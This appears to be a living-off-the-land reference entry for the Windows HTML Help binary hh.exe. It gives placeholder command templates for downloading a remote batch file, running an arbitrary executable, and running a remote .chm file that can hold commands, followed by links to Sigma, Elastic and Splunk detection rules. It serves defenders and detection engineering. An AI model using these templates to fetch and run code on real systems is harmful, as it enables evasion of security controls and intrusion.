Hh.exe
Binary used for processing chm files in Windows
Paths
C:\Windows\hh.exeC:\Windows\SysWOW64\hh.exe
Commands
Download
Open the target batch script with HTML Help.
Use case: Download files from url
Privileges: User
HH.exe {REMOTEURL:.bat}
Execute
Executes specified executable with HTML Help.
Use case: Execute process with HH.exe
Privileges: User
HH.exe {PATH_ABSOLUTE:.exe}
Execute
Executes a remote .chm file which can contain commands.
Use case: Execute commands with HH.exe
Privileges: User
HH.exe {REMOTEURL:.chm}
Detection
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml